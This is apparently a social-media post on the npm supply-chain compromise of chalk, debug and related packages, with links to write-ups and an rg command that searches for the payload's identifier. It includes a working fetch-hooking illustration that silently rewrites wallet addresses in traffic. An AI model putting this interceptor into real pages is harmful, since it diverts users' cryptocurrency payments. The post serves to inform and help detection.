npm got broken again

*Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series of packages being pushed to npm, which appeared to contain malicious code. These were 18 very popular packages:

- backslash (0.26m downloads per week)
- chalk-template (3.9m downloads per week)
- supports-hyperlinks (19.2m downloads per week)
- has-ansi (12.1m downloads per week)
- simple-swizzle (26.26m downloads per week)
- color-string (27.48m downloads per week)
- error-ex (47.17m downloads per week)
- color-name (191.71m downloads per week)
- is-arrayish (73.8m downloads per week)
- slice-ansi (59.8m downloads per week)
- color-convert (193.5m downloads per week)
- wrap-ansi (197.99m downloads per week)
- ansi-regex (243.64m downloads per week)
- supports-color (287.1m downloads per week)
- strip-ansi (261.17m downloads per week)
- chalk (299.99m downloads per week)
- debug (357.6m downloads per week)
- ansi-styles (371.41m downloads per week)

All together, these packages have more than 2 billion downloads per week.*

Source: npm debug and chalk packages compromised https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

The injected code was obfuscated and intercepted traffic:

This malware is essentially a browser-based interceptor that hijacks both network traffic and application APIs. It injects itself into functions like fetch, XMLHttpRequest, and common wallet interfaces, then silently rewrites values in requests and responses.
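As an added illustration of the hooking pattern the quote describes, reduced to `fetch` only (this is not the malware's code and not from Aikido's write-up; the addresses, the rewrite rule and the stub backend are constructed placeholders), plus one cheap tripwire that tells a browser-native `fetch` from a JavaScript wrapper:

```javascript
// Added illustration, not the actual payload: a fetch-hooking interceptor that
// rewrites values in outbound request bodies and inbound responses, and a check.

// Constructed placeholder values; not real addresses.
const VICTIM_RECIPIENT = '0x' + '1'.repeat(40);
const ATTACKER_RECIPIENT = '0x' + 'f'.repeat(40);

// Constructed rewrite rule: any 0x + 40 hex chars (an Ethereum-style address)
// is silently replaced with the attacker's.
function rewriteBody(text) {
  return text.replace(/0x[0-9a-fA-F]{40}/g, ATTACKER_RECIPIENT);
}

// Install the hook on an environment object (window in a browser; a stub here).
// Returns the original fetch so the caller can compare against it later.
function installInterceptor(env, rewrite = rewriteBody) {
  const originalFetch = env.fetch;
  env.fetch = async function hookedFetch(input, init) {
    // Outbound: rewrite a string request body before it leaves the page.
    if (init && typeof init.body === 'string') {
      init = { ...init, body: rewrite(init.body) };
    }
    const res = await originalFetch.call(this, input, init);
    // Inbound: wrap the body readers so the application sees rewritten content.
    const readText = res.text.bind(res);
    res.text = async () => rewrite(await readText());
    res.json = async () => JSON.parse(await res.text());
    return res;
  };
  return originalFetch;
}

// Tripwire: a browser-native fetch stringifies to "[native code]"; a JS wrapper
// does not. Caveat: an attacker can also patch Function.prototype.toString, so a
// "native" answer is not proof of a clean environment, only a cheap first check.
function looksNative(fn) {
  return /\[native code\]/.test(Function.prototype.toString.call(fn));
}

// Constructed stand-in for a wallet backend: echoes the recipient it received.
function makeStubEnv() {
  return {
    fetch: async (_url, init) => {
      const sent = init && init.body ? JSON.parse(init.body) : {};
      const reply = JSON.stringify({ to: sent.to || VICTIM_RECIPIENT, amount: '1.0' });
      return { text: async () => reply };
    },
  };
}

// Same request before and after the hook is installed.
async function demo() {
  const env = makeStubEnv();
  const req = () => env.fetch('/api/tx', { method: 'POST', body: JSON.stringify({ to: VICTIM_RECIPIENT }) });
  const before = JSON.parse(await (await req()).text()).to;
  const original = installInterceptor(env);
  const after = (await (await req()).json()).to;
  return { before, after, patched: env.fetch !== original, nativeNow: looksNative(env.fetch) };
}

demo().then((r) => console.log(r));
```

The same trick applies to `XMLHttpRequest` (wrapping `open`/`send` and the `responseText` getter) and to injected wallet provider objects; the `looksNative` check only covers globals the browser itself provides, so comparing against a reference captured at page load is the more robust variant.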

Access was stolen from one maintainer via phishing https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydje4zqis2y

The article claims that a maintainer of other packages was hit by a similar attack.

I attached the table of package versions to the post.

More links to read

We Just Found Malicious Code in the Popular NPM Package https://jdstaerk.substack.com/p/we-just-found-malicious-code-in-the

https://news.ycombinator.com/item?id=45169657

npm Author Qix Compromised via Phishing Email in Major Supply Chain Attack https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack

Issues: https://github.com/chalk/chalk/issues/656 and https://github.com/debug-js/debug/issues/1005#issuecomment-3266885191

To check whether any of this nastiness is in your dependencies, search for the `_0x112fa8` identifier from the injected obfuscated payload (`-uu` makes ripgrep look into ignored and hidden paths such as node_modules):

$ rg -uu --max-columns=80 --glob '*.js' _0x112fa8

Posted on Сетка (the social network from hh.ru)